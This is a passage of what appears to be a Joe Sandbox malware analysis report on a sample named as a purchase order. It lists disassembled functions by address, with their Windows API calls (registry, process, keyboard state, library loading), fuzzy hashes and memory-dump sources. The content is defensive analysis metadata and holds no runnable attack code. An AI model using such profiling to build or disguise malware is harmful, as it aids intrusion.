                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                  • String ID: \VH
                                  • API String ID: 3884216118-234962358
                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                  • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                  • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                  • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                  Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                  • IsMenu.USER32(?), ref: 0044854D
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                  • DrawMenuBar.USER32 ref: 004485AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Item$DrawInfoInsert
                                  • String ID: 0
                                  • API String ID: 3076010158-4108050209
                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                  Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                  • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$_memmove_wcslen
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 1589278365-1403004172
                                  • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                  • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                  • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                  • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                  Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                  Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                  Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SysAnimate32
                                  • API String ID: 0-1011021900
                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                  Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                  • GetFocus.USER32 ref: 0046157B
                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                  • 74286A70.USER32(?,Function_00045B98,?), ref: 004615EF
                                  • __swprintf.LIBCMT ref: 00461608
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Thread$Parent$74286AttachClassCurrentFocusInputMessageNameProcessSendTimeoutWindow__swprintf_memmove_wcslen
                                  • String ID: %s%d
                                  • API String ID: 3220401950-1110647743
                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                  Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                  • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                  • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                  • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                  Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                  • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                  • String ID:
                                  • API String ID: 3488606520-0
                                  • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                  • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                  • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                  • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                  Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ConnectRegistry_memmove_wcslen
                                  • String ID:
                                  • API String ID: 15295421-0
                                  • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                  • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                  • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                  • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                  Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                  • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                  • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressProc$Library$FreeLoad
                                  • String ID:
                                  • API String ID: 2449869053-0
                                  • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                  • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                  • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                  • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                  Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004563A6
                                  • ScreenToClient.USER32(?,?), ref: 004563C3
                                  • GetAsyncKeyState.USER32(?), ref: 00456400
                                  • GetAsyncKeyState.USER32(?), ref: 00456410
                                  • 742845F0.USER32(?,000000F0), ref: 00456466
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AsyncState$742845ClientCursorScreen
                                  • String ID:
                                  • API String ID: 2494728105-0
                                  • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                  • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                  • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                  • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                  Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                  • Sleep.KERNEL32(0000000A), ref: 0047D455
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID:
                                  • API String ID: 327565842-0
                                  • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                  • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                  • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                  • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                  Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                  • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                  • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                  • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: PrivateProfile$SectionWrite$String
                                  • String ID:
                                  • API String ID: 2832842796-0
                                  • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                  • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                  • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                  • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                  Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
